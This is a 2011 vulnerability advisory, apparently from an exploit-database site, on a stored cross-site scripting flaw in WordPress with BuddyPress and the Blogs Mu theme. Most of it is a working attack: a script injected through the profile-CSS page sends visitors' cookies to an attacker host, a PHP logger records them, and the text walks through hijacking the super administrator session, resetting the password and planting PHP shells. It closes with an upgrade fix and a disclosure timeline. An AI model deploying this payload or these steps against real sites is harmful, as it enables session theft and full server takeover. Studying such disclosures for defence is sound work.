WordPress + Buddypress + Blogs Mu Theme Cross Site Scripting

2011.09.27
Credit: none
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Wordpress + Buddypress + Blogs Mu theme = XSS to Super Admin to Server Compromise ---------------------------------------------------------------------------------- Cross-site scripting (XSS) vulnerabilities tend to be seen as one of the less serious security issues. Sometimes XSS can be serious, leading to complete server compromise... Severity: High Vulnerable setup: PHP<=5.2 (tested on CentOS 5), Wordpress<=3.1.4, Buddypress<=1.2.10 (with bbPress forum integrated), Blogs Mu theme<=1.2.6 Victim box's IP: 192.168.0.11 Attacker box's IP: 192.168.0.4 By registering to the Wordpress site as a regular 'subscriber' (here I use 'regularuser' as the username), and then signing in, it is possible to submit the following javascript to the page at http://192.168.0.11/members/regularuser/settings/profile-css/ (in my test), the page can also be accessed via the themes bar at the top of the page: <script> var http = new XMLHttpRequest() var url = "http://192.168.0.4/xss.php?" + "t=" + encodeURI(top.document.title) + "&c=" + encodeURI(document.cookie); http.open("GET", url); http.send(); </script> The xss.php script looks as follows, and simply dumps the user cookies of whichever user visits the http://192.168.0.11/members/regularuser/profile/ page (social engineering can be used to get particular users to visit this page): <?php $usercookies = fopen('cookies/cookies.txt', 'a'); fwrite($usercookies, "Site|Username|Page: " . urldecode($_GET['t']) . "\t" . "Cookie: " . urldecode($_GET['c']) . "\n"); fclose($usercookies); ?> Opening the 'cookies/cookies.txt' file reveals the following information (after the Wordpress super administrator has signed in and then viewed the public profile for 'regularuser'): Site|Username|Page: test site | regularuser | Profile Cookie: wordpress_test_cookie=WP Cookie check; wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1=admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4 By signing in as 'regularuser' and then editing his existing cookie to 'wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1' with the value 'admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4', the attacker has completely compromised the Buddypress components of the Wordpress installation, essentially signing in as the super administrator, and being able to do anything the administrator can do via Buddypress (for example, sending messages to all users of the Wordpress site). Further, it is possible to completely compromise the Wordpress installation by then going to: http://192.168.0.11/members/admin/settings/general/ And changing the administrator password, after which going to: http://192.168.0.11/wp-admin/ Allows the attacker to control the whole Wordpress site as the super administrator (without even entering the new password). By editing PHP files within the Wordpress directory tree, PHP shells or backdoors can be added, compromising the server. To defend against this simply upgrade outdated installations of Wordpress, Buddypress and the Blogs MU theme. Timeline: 19 September 2011: vendor notified. <=23 September 2011: Buddypress updated to 1.5 and Blogs Mu theme updated to 1.2.7, issues fixed.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top